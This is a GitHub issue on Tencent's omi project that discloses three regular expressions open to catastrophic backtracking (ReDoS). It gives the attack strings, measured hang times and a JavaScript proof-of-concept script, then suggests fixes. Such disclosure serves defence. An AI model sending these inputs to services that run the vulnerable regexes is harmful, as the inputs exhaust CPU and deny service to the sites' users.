omi icon indicating copy to clipboard operation
omi copied to clipboard
verified publisher icon Tencent

Vulnerable Regular Expressions in omi

Open yetingli opened this issue 5 years ago • 0 comments

Type of Issue Potential Regex Denial of Service (ReDoS)

Description Here are three regular expressions with ReDos vulnerabilities, as shown below.

  1. regex1 = /( +)[^:]+::/ location The ReDOS vulnerability of the regex is mainly due to the sub-pattern ( +)[^:]+ and can be exploited with the following string " " * 5000 It took 44.0 seconds for regex1 to match the malicious string
  2. regex2 = /\bOBTW\s+[\s\S]*?\s+TLDR\b/ location The ReDOS vulnerability of the regex is mainly due to the sub-pattern \s+[\s\S]*?\s+ and can be exploited with the following string "OBTW" + " " * 5000 It took 44.6 seconds for regex2 to match the malicious string
  3. regex3 = /^(#{1,6})[ \t]*(.+?)[ \t]*#*\n+/ location1 location2 The ReDOS vulnerability of the regex is mainly due to the sub-pattern [ \t]*(.+?)[ \t]* and can be exploited with the following string "#" + " " * 5000 It took 51.4 seconds for regex3 to match the malicious string

I prepared a script that showcases the execution times of the vulnerable regexes as follows.



// When attack_str.length=5000 , it took 44.0 seconds
regex1 = /( +)[^:]+::/;
var attack_str = " ";
console.log("regex1: "+regex1)
for (let i = 1; i < 5000; i++) {
    attack_str = attack_str + " ";
    if (attack_str.length%100==0){
        var time = Date.now();
        regex1.test(attack_str);
        var run_time = Date.now() - time;
        console.log("attack_str.length: " + attack_str.length + ": " + run_time+" ms")
    }
}



//When attack_str.length=5000 , it took 44.6 seconds
regex2 = /\bOBTW\s+[\s\S]*?\s+TLDR\b/;
var attack_str = "OBTW";
console.log("regex2: "+regex2)
for (let i = 1; i < 5000; i++) {
    attack_str = attack_str + " ";
    if (attack_str.length%100==0){
        var time = Date.now();
        regex2.test(attack_str);
        var run_time = Date.now() - time;
        console.log("attack_str.length: " + attack_str.length + ": " + run_time+" ms")
    }
}

// When attack_str.length=5000 , it took 51.4 seconds
regex3 = /^(#{1,6})[ \t]*(.+?)[ \t]*#*\n+/;
var attack_str = "#";
console.log("regex3: "+regex3)
for (let i = 1; i < 5000; i++) {
    attack_str = attack_str + " ";
    if (attack_str.length%100==0){
        var time = Date.now();
        regex3.test(attack_str);
        var run_time = Date.now() - time;
        console.log("attack_str.length: " + attack_str.length + ": " + run_time+" ms")
    }
}

I am willing to suggest that you limit the input length, modify these regexes or replace these regexes with other codes.

yetingli avatar Sep 14 '20 03:09 yetingli